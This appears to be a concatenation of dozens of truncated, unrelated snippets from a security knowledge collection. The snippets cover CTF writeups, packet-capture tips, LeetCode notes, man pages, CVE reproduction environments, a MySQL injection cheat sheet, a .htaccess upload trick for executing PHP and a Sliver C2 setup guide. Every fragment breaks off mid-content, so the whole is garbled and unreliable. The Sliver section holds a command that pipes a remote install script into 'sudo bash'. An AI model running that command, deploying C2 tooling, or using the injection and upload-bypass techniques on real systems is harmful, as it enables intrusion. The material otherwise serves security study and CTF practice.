# 数据提取 这一块是流量包中另一个重点,通过对协议分析,找到了题目的关键点,如何提取数据成了接下来的关键问题 ## wireshark ### wireshark自动分析 `file -> export objects -> http` ### 手动数据提取 `file->export selected Packet Bytes` ## tshark tshark作为wireshark的命令行版,高效快捷是它的优点,配合其余命令行工具(awk,grep)等灵活使用,可以快速定位,提取数据从而省去了繁杂的脚本编写 再看`Google CTF 2016 Forensic-200`这一题,可以通过tshark迅速完成解题 ```shll...
sec-knowleage
# Alexandria Category: Weekly Challenges, 10 points ## Description > Don't judge a book by its cover... > > The flag format is flag{...} with underscores between words, for example flag{example_flag}. Change the flag in accordance to this format. ``` 1612130291 0140283331 0553588486 0307588378 031606792X 0762447699 ...
sec-knowleage
# Leetcode 题解 - 图 <!-- GFM-TOC --> * [Leetcode 题解 - 图](#leetcode-题解---图) * [二分图](#二分图) * [1. 判断是否为二分图](#1-判断是否为二分图) * [拓扑排序](#拓扑排序) * [1. 课程安排的合法性](#1-课程安排的合法性) * [2. 课程安排的顺序](#2-课程安排的顺序) * [并查集](#并查集) * [1. 冗余连接](#1-冗余连接) <!-- GFM-TOC --> ## 二分图 如果可以用两种颜色对图中的节点进行着色,并且保证相邻的节点...
sec-knowleage
import codecs import itertools import re from Crypto.Cipher import AES def read_data(file): with codecs.open(file, "r") as input_file: input_file.readline() input_file.readline() data = input_file.readline() return data def get_agreed_bytes(data_sent, bases_measured, bases_correc...
sec-knowleage
# GitLab Arbitrary File Disclosure (CVE-2016-9086) [中文版本(Chinese version)](README.zh-cn.md) GitLab is a web-based DevOps lifecycle tool that provides a Git repository manager providing wiki, issue-tracking and continuous integration and deployment pipeline features. Jobert Abma from HackerOne disclosed a critical se...
sec-knowleage
/* * Copyright 2015-2018 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by ap...
sec-knowleage
# Sliding 2 Category: Reversing & Binary Exploitation, 500 points ## Description > This challenge is so easy my cousin can solve it in a few seconds! A binary file was attached. ## Solution Let's run the binary file: ```console ┌──(user@kali)-[/media/sf_CTFs/technion/Sliding_2] └─$ ./sliding_2 Enter key: test Invalid K...
sec-knowleage
# SDN 笔记 --- ## ODL虚拟机基础配置 开完 ODL 虚拟机后先配置 IP 配置文件在 /etc/network/interface 目录下. ```bash vim /etc/network/interface iface eth0 inet static address 172.16.9.100 # 修改成自己的 IP 地址 netmask 255.255.255.0 # 修改成自己的掩码地址 gateway 172.16.9.254 # 修改成自己的网关地址 ``` 建议虚拟机开 NAT 模式 然后 IP 配置同网段 vmnet 网卡 IP 再用 SecureCRT 开3个窗口 SSH 上去,一个窗口开 Op...
sec-knowleage
slabtop === 实时显示内核slab内存缓存信息 ## 补充说明 **slabtop命令** 以实时的方式显示内核“slab”缓冲区的细节信息。 ### 语法 ```shell slabtop(选项) ``` ### 选项 ```shell --delay=n, -d n:每n秒更新一次显示的信息,默认是每3秒; --sort=S, -s S:指定排序标准进行排序(排序标准,参照下面或者man手册); --once, -o:显示一次后退出; --version, -V:显示版本; --help:显示帮助信息。 ``` 排序标准: * a: sort by number of active objects * b:...
sec-knowleage
# 26. 树的子结构 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/6e196c44c7004d15b1610b9afca8bd88?tpId=13&tqId=11170&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/84a5b15a-86c5...
sec-knowleage
# Kipod After Free CTF 2019 Writeups for various challenges from the 2019 [Kipod After Free](https://play.kaf.sh) (KAF) CTF.
sec-knowleage
在写第五季的时候,vps 掉线了,ssh 重新登录后,无法切到 MSF session 下,想到部分同学如果在 vps 上操作也会遇到这个问题,故本季解决该问题。 ### tmux是什么? Tmux是一个优秀的终端复用软件,类似GNU Screen,但来自于OpenBSD,采用BSD授权。使用它最直观的好处就是,通过一个终端登录远程主机并运行tmux后,在其中可以开启多个控制台而无需再“浪费”多余的终端来连接这台远程主机。是BSD实现的Screen替代品,相对于Screen,它更加先进:支持屏幕切分,而且具备丰富的命令行参数,使其可以灵活、动态的进行各种布局和操作。 ### Tmux的使用场景 1. 可以某个程序在执行时一直是输...
sec-knowleage
.\" Copyright (c) 1989, 1990, 1993 .\" The Regents of the University of California. All rights reserved. .\" Chinese version Copyright (c) 苏勇 ysu@gnocis.org .\" .\" This code is derived from software contributed to Berkeley by .\" Kim Letkeman. .\" .\" Redistribution and use in source and binary forms, with or withou...
sec-knowleage
#!/usr/bin/env python3 import sys import random from cryptography.hazmat.primitives import serialization from cryptography.hazmat.backends import default_backend def ReadPrivateKey(filename): return serialization.load_pem_private_key( open(filename, 'rb').read(), password=None, backend=default_backend()) d...
sec-knowleage
# minifd Pwn, Medium ## Description > This is a simple file manager implementation supporting basic functionality to create, read, and write files. Please note: This is a prototype implementation. At this point of time, only 16 files can be managed at the same time. A binary file was attached. ## Solution Let's inspec...
sec-knowleage
# Imagetragick 命令执行漏洞(CVE-2016–3714) ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 参考链接: - https://imagetragick.com - https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html - https://github.com/ImageTragick/PoCs ## 漏洞环境 执行如下命令启动一个包含了...
sec-knowleage
class Display: def __init__(self): self.data=[' ' for i in range(256)] self.ptr = 0 def __repr__(self): return '#'*22+'\n'+'#'+''.join(self.data[:20])+'#'+'\n'+'#'+''.join(self.data[64:84])+'#'+'\n'+'#'+''.join(self.data[20:40])+'#'+'\n'+'#'+''.join(self.data[84:104])+'#'+'\n'+'#'*22 ...
sec-knowleage
**注:**请多喝点热水或者凉白开,可预防**肾结石,通风**等。 ### Rundll32简介: Rundll32.exe是指“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。 **说明:**Rundll32.exe所在路径已被系统添加PATH环境变量中,因此,Wmic命令可识别,需注意x86,x64位的Rundll32调用。 Windows 2003 默认位置: ```bash C:\Windows\System32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe ``` Windows 7 默认位置: ```bash...
sec-knowleage
# Blockchain Security Overview > 区块链安全近几年发展比较迅速,但是 wiki 上没有相关内容,遂拉了几个小伙伴,一起撰写了区块链安全相关内容,可能某些用词不是很准确,还请见谅,也可以提问 issue,会及时更改 概述区块链安全的一些方向,主要分为 **公链安全** 和 **智能合约** 安全 ## 公链安全 待补充 ## 智能合约安全 主要介绍使用 `Solidity` 这种主流编程语言的 Ethereum 安全方面的基础知识。
sec-knowleage
# Treasure map (forensics/osint, 136p, 12 solved) A very weird challenge. We get a [pdf](pdf.pdf) to work with. We initially spent a lot of time analysing it, looking at the streams, fonts, etc. In the end someone noticed that the geographical locations names in the content of the pdf, at the very beginning are the sam...
sec-knowleage
from math import sqrt def is_prime(number): if number % 2 == 0: return False else: for divisor in range(3, int(sqrt(number)) + 1, 2): if number % divisor == 0: return False return True def epicfail(memes): if memes > 1: if is_prime(memes): ...
sec-knowleage
# MYSQL Injection ## Summary * [MYSQL Default Databases](#mysql-default-databases) * [MYSQL Comments](#mysql-comments) * [MYSQL Union Based](#mysql-union-based) * [Detect columns number](#detect-columns-number) * [Extract database with information_schema](#extract-database-with-information_schema) * [Extrac...
sec-knowleage
from flask import Flask, render_template, request, render_template_string from pyasn1.codec.ber.decoder import decode from pyasn1.type.univ import OctetString from urllib2 import urlopen from sha4 import hash import string app = Flask(__name__) bad = """ <h2>yo that comment was bad, we couldn't parse it</h2>""" un...
sec-knowleage
# sliver --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **项目地址** - https://github.com/BishopFox/sliver **使用文档** - https://github.com/BishopFox/sliver/wiki **相关文章** - [sliver c2代码的学习](https://x.hacking8.com/post-445.html) --- ## 安装 **官方一条命令版** ```bash # 安装 curl https://sliver.sh/install|sudo bash #...
sec-knowleage
# .htaccess upload Uploading an .htaccess file to override Apache rule and execute PHP. "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php...
sec-knowleage
# PostgreSQL 提权漏洞(CVE-2018-1058) PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 参考链接: - https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058:_Protect_Your_Search_Path - https://xianzhi.aliyun.com/forum/topic/2109 ## 漏洞环境 启动存在漏洞的环境: ``` docker compose up -d ``` 环境启动后,将在本地开...
sec-knowleage
#include <bits/stdc++.h> using namespace std; struct RNG { random_device dev; mt19937_64 rng; RNG() : dev(), rng(dev()) {} RNG(uint64_t seed) : rng(seed) {} bool next_bit() { return rng() & 1; } // For when we want to hide the RNG state uint64_t next_qword_safe() { uint64_t res = ...
sec-knowleage
## Rabit (Crypto, 175 points, 71 solves) Just give me a bit, the least significant's enough. Just a second we’re not broken, just very, very insecure. Running at rabit.pwning.xxx:7763 ###ENG [PL](#pl-version) We get the [server files](server) so we can analyse the cryptosystem. It turns out that the flag is encrypte...
sec-knowleage